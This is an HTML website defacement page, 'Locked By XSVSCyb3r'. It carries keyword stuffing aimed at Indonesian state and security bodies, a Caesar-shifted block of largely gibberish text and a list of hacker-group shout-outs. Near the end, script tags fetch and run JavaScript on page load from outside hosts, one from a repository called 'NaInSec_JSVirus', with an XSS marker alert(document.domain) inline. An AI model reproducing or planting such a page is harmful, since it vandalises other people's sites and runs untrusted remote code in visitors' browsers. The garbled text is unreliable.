<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=0.65">
    <meta name="og:image" content="img/101.png">
    <meta name="og:description" content="Locked By XSVSCyb3r">
    <meta name="keywords" content="Pemilu 2024, Jokowi, Megawati, Puan Maharani, Prabowo, BSSN, Militer, Polri, Cyber Polri, TNI AD, TNI AU, TNI AL, Rumah Sakit, Pemerintah, Pak Ganjar, KPK, KPU, BNN, Badan Intelijen Negara, Russia, Cina, Jepang, Belanda, Korea Selatan, Korea Utara, Malaysia, Papua Nugini, NTB, NTT, Dempasar, Bali, Jawa Timur, Cara Install Kali Linux, Cara Install Ubuntu, Cara Install Linux Mint, Cara Install Fedora, Github, Gitlab, HackerOne, Bug Bounty, Bug Hunter, Cyber Security, Hackers, Hacker, Bjorka, Anonymous Imdonesia, Anonymous, Hacker Russia, Amerika, Canada, Belgia, Brazil, Swedia, Norwegia, Pakistan, Palestina, Irak, Iran, Arab Saudi.">
    <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
    <meta name="theme-color" content="black">
    <link rel="shotcut icon" href="img/101.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <title>Locked By XSVSCyb3r</title>
    <style type="text/css" media="all">
    @import url('https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer&display=swap');
    body {
      background-color: black;
      color: lime;
      font-family: Saira Stencil One;
      font-family: 'Fredericka the Great', sans-serif;
      font-weight: 100;
    }
    h1 {
      font-family: 'Fredericka the Great', 'Lacquer', sans-serif;
      font-weight: 100;
      font-size: 47px;
    }
    h2 {
      font-family: 'Fredericka the Great', 'Lacquer', sans-serif;
      font-weight: 100;
      font-size: 30;
    }
    p{
      font-size: 18px; 
    }
    img{
      width: 500px;
    }
    audio {
      opacity:0.85;
      border-radius:0px;
      border:0px #fff solid;
    }
    center {
      width:100%;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      height: 50%;
      margin: auto;
      position: absolute;
    }
    .Saira-Stencil-One {
  font-family: "Saira Stencil One", cursive;
  font-weight: 350;
}
    </style>
  </head>
  <body>
    <center>
      <img src="img/101.png" alt="Locked By XSVSCyb3r">
      <h1><font color="red">Locked By XSVSCyb3r<font color="lime"> | </font><font color="white">XSVSCyb3r.ID</font></font></h1>
      <h2>
        Wkh yllohq zloo dovr eh d yllohq li wkh khuq wkhuh lv wkh vwrulq. Hxwhb yllohq lv wkh khuq ri klv rshq vwrulz! Brx Hvzcdu Glh D Khuq, Ru Brx Ohvh Orrq Wkurz Wr Dvryhu Wkh Yllohq! L sdufhv d uhdoo yllohq wr d iruh lvod. Lq wklv wkhp vkrxog vshqg db wkhp kdwplqhu rq wkh urrp. Klzlwu zloo hgxfw iru ehfrq wkh vshlfh, wkurz brx kdvqhg ehsxwhuvlq. Grqdog zloo ghyrrx ir lq lvkluqr duudqw ru d khuq. Lwklqhh lv wlohkhh vljkwh lv vruw wkhan iljwh! Lwklqhh lv wlohkhh vljkwh lv dqj lvgl! Dqg lfgfv duhdv duh eylrxsurrshv! Semua memiliki arti dan makna yang berbeda ☠️☠️☠️
        </h2>
        <h1><font color="red">Thanks<font color="lime"> ToMy </font><font color="white">Friends</font></font></h1>
      <h2><font color="yellow">XXSec101 - SangBima - Jenateke - PoetraKahir101 - Jh0nWick - Xer00x - Henakyy666 - Sachi69 - Ndae101 - VictimSec - Bl4ck5ud0 - NaInSec - 313MCA - AnunnakiCT - Xecr00t - XecureIT - XXXr00t - MikaSec111 - Putri666Sec - Su745xxx - Sinta001 - Sense0010 - Saras013 - Wannacry045 - Sc0rp10n - Marsinah45 - Munir101 - MoneSanggini - AnnaSanggini - AinaTele333 - AF313Xecure - Indah022 - Crypt0n - GhostOneNet - XXNetOne - BimaSHT - IDNHack - CSA101 - XXX101 - XXViceroy - Escobar666 - Mecxina017 - XB1Army - XXB001 - RUSMaksim - IndoRuss - Kananga434 - Nggar0xxx - PatriotX - VincenXXX - Annabela - Longg4R - Sanggar1 - XecSanggar - KesB1M4 - Zabr1X - XoXoSecurity - Yuzzu101 - NimetriX - CyberSec666 - CR7XXX - WeidsomJR - Laras3031 - 33owen66 - Detari99 - SangPoetry01 - SiweGaga - AriMuacy - BSSNRI - STINRI - BINRI - BNNRI - KPURI - KominfoID - KPKRI - PolriSec</font></h2>
      <h1><font color="red">Love<font color="lime"> You </font><font color="white">Palestine</font></font></h1><br>
      <audio src="music/DJAlreadyGone.mp3" controls></audio><br><br><br><br><br><br><br><br>
    </center>
    <script type="text/javascript" src="https://raw.githubusercontent.com/NaInSec/NaInSec_JSVirus/main/Apps.js">alert(document.domain);</script>
    <script type="text/javascript" src="https://mynameisrosita.nasiwebhost.com/developers/bimasilahackersteam/bootstrap/validate.js">
    </script>
    <script type="text/javascript" src="https://mynameisrosita.nasiwebhost.com/developers/bimasilahackersteam/bootstrap/js/bootstrap.bundle.min.js">
    </script>
    <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
  </body>
</html>



